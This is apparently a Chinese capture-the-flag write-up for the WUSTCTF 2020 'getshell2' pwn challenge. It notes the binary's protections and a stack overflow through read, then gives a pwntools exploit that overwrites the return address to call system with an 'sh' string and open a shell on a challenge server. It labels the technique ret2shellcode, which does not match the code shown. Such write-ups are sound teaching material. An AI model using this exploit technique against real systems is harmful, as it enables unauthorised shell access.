01[WUSTCTF 2020]getshell2

考点：栈溢出，ret2shellcode
首先查看保护机制

为32位小端程序，开启了栈不可执行。
用IDA32查看伪代码

追踪到vulnerable函数

可以通过read实现溢出
exp：

#p = process('./pwn')
p = remote("1.14.71.254",'28608')
sh = 0x08048670
#0x08048670 : sh   ROPgadget --binary pwn --string "sh"
system = 0x08048529
#0x080482bf : system    ROPgadget --binary pwn --string "system"
bin_add = 0x08048658
#ROPgadget --binary pwn --string "bin"
payload = b'a'*(0x18+4)+p32(system)+p32(sh)
p.sendline(payload)
p.interactive()

本栏目推荐文章
• 【pwn】cmcc_simplerop --rop链的构造
• 【pwn】hitcontraining_uaf --堆利用之uaf
• 【pwn】inndy_rop --ropchain的利用
• pwn2_sctf_2016
• wanna_pwn2own!
• PWN入门
• 【pwn】[ZJCTF 2019]EasyHeap --fastbin攻击，house of spirit
• pwn知识——ret2text进阶
• Pwn 练习随笔
• 【pwn】[HNCTF 2022 WEEK3]smash --花式栈溢出

Pwnctf-pwn pwn2own pwn2 pwn1 事儿pwn pwn3 kernel-pwn pwn-wp 环境pwn 笔记pwn